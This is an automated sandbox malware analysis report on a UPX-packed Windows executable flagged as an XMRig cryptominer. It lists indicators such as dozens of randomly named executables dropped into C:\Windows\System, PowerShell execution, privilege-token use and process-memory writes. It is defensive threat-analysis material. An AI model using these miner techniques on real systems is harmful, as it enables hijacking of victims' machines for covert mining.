Malware Analysis Report

2025-04-19 15:34

Sample ID 240522-1aqv5she46
Target 3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe
SHA256 5cefae8496ca71f45af7f36f6e641aeb3973ac24408559d6bb60449d6373beab
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5cefae8496ca71f45af7f36f6e641aeb3973ac24408559d6bb60449d6373beab

Threat Level: Known bad

The file 3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 21:27

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 21:27

Reported

2024-05-22 21:29

Platform

win7-20240221-en

Max time kernel

115s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\dLdNVMF.exe N/A
N/A N/A C:\Windows\System\pQQStOy.exe N/A
N/A N/A C:\Windows\System\GRPMjHs.exe N/A
N/A N/A C:\Windows\System\SEgDtWK.exe N/A
N/A N/A C:\Windows\System\IxotWxT.exe N/A
N/A N/A C:\Windows\System\ddNqIYi.exe N/A
N/A N/A C:\Windows\System\dxMeFqq.exe N/A
N/A N/A C:\Windows\System\cvhaHCh.exe N/A
N/A N/A C:\Windows\System\QhMgukx.exe N/A
N/A N/A C:\Windows\System\dlgUdEW.exe N/A
N/A N/A C:\Windows\System\AOFoZlJ.exe N/A
N/A N/A C:\Windows\System\fnkPzvD.exe N/A
N/A N/A C:\Windows\System\rnSGyZj.exe N/A
N/A N/A C:\Windows\System\VKwSigU.exe N/A
N/A N/A C:\Windows\System\UwCUhag.exe N/A
N/A N/A C:\Windows\System\JeNehbm.exe N/A
N/A N/A C:\Windows\System\TiXqJSs.exe N/A
N/A N/A C:\Windows\System\Bnoleor.exe N/A
N/A N/A C:\Windows\System\HiNLQSh.exe N/A
N/A N/A C:\Windows\System\iHhRKfg.exe N/A
N/A N/A C:\Windows\System\zSZiufG.exe N/A
N/A N/A C:\Windows\System\JILWwNi.exe N/A
N/A N/A C:\Windows\System\vPsGhOX.exe N/A
N/A N/A C:\Windows\System\FkKXgKc.exe N/A
N/A N/A C:\Windows\System\WuSQWiY.exe N/A
N/A N/A C:\Windows\System\ikNnGAq.exe N/A
N/A N/A C:\Windows\System\fauItDy.exe N/A
N/A N/A C:\Windows\System\dhKalZv.exe N/A
N/A N/A C:\Windows\System\RjRdRde.exe N/A
N/A N/A C:\Windows\System\YxHQfWs.exe N/A
N/A N/A C:\Windows\System\EcOjBQr.exe N/A
N/A N/A C:\Windows\System\DdbJSkl.exe N/A
N/A N/A C:\Windows\System\XNPDwMj.exe N/A
N/A N/A C:\Windows\System\vieQIYR.exe N/A
N/A N/A C:\Windows\System\eRpDBFl.exe N/A
N/A N/A C:\Windows\System\EgMaefN.exe N/A
N/A N/A C:\Windows\System\keiZCXV.exe N/A
N/A N/A C:\Windows\System\xlmgJmX.exe N/A
N/A N/A C:\Windows\System\FkiBrmI.exe N/A
N/A N/A C:\Windows\System\locJLfj.exe N/A
N/A N/A C:\Windows\System\WXeZTNJ.exe N/A
N/A N/A C:\Windows\System\oRzsPhx.exe N/A
N/A N/A C:\Windows\System\aZecunA.exe N/A
N/A N/A C:\Windows\System\yXulIxx.exe N/A
N/A N/A C:\Windows\System\WcKCLsz.exe N/A
N/A N/A C:\Windows\System\nvERgWR.exe N/A
N/A N/A C:\Windows\System\leTCOVQ.exe N/A
N/A N/A C:\Windows\System\wJLIJwU.exe N/A
N/A N/A C:\Windows\System\GZdTdch.exe N/A
N/A N/A C:\Windows\System\RpvhoNA.exe N/A
N/A N/A C:\Windows\System\IniwopB.exe N/A
N/A N/A C:\Windows\System\TqMGfVg.exe N/A
N/A N/A C:\Windows\System\BxtJgvi.exe N/A
N/A N/A C:\Windows\System\UuiDgYP.exe N/A
N/A N/A C:\Windows\System\vdiNPAm.exe N/A
N/A N/A C:\Windows\System\fshQNox.exe N/A
N/A N/A C:\Windows\System\CYmKokn.exe N/A
N/A N/A C:\Windows\System\xZlMINO.exe N/A
N/A N/A C:\Windows\System\XTKnrgb.exe N/A
N/A N/A C:\Windows\System\bUhsWQZ.exe N/A
N/A N/A C:\Windows\System\FaUqixM.exe N/A
N/A N/A C:\Windows\System\MKVVTcM.exe N/A
N/A N/A C:\Windows\System\cnjdfNf.exe N/A
N/A N/A C:\Windows\System\VQdLmGH.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\WbPQMih.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\OlShrnW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ECyRnrF.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\LZWHuAX.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\RhrnOPd.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jCSxlLQ.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\RiwoslW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\lRzcYkW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\vfnSnQV.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jSIriAp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\YLMEggn.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ckNimIN.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\tXFkZNc.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\zEkNrBC.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZgVMDss.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\xxMJROS.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\RwJDpGf.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\NZENITI.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\AUZhWBR.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\CknqCPE.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\GcPPQux.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\Luybycp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ylubjqc.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\FKAhady.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\VRuswZN.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\qNqGRDV.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\XzwNABi.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IGJOZRq.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\DqishkH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\djbkPcP.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\AqIwANg.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IZpHjgT.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\WkhYKRB.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\JhDKnBE.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\oKMwCUc.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jBVhKsa.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\jKvfrrR.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\yoLltKR.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\QwEiDlp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\SPVxNXr.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\dqhjHFi.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\IHtrjbS.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ENUcgTa.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\vLjUyfO.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\CZydNEA.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\btBIVpu.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\zuvlWiA.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\CPDddea.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\dWkzXJW.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\UoDrAnf.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\YAiwzje.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\biSHPdE.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZGHyqAY.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\ieJpjcs.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\cCozjVh.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\asMyEtp.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\FusExEQ.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\tzbfAvf.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\TmfBghC.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\LoZyhgr.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\PmLkIxf.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\LIKvTjH.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\uvrqOxo.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
File created C:\Windows\System\NooVZIq.exe C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2104 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dLdNVMF.exe
PID 2104 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dLdNVMF.exe
PID 2104 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\dLdNVMF.exe
PID 2104 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pQQStOy.exe
PID 2104 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pQQStOy.exe
PID 2104 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\pQQStOy.exe
PID 2104 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\GRPMjHs.exe
PID 2104 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\GRPMjHs.exe
PID 2104 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\3fe8705d37a980d8cea6a696b4cf0970_NeikiAnalytics.exe C:\Windows\System\GRPMjHs.exe
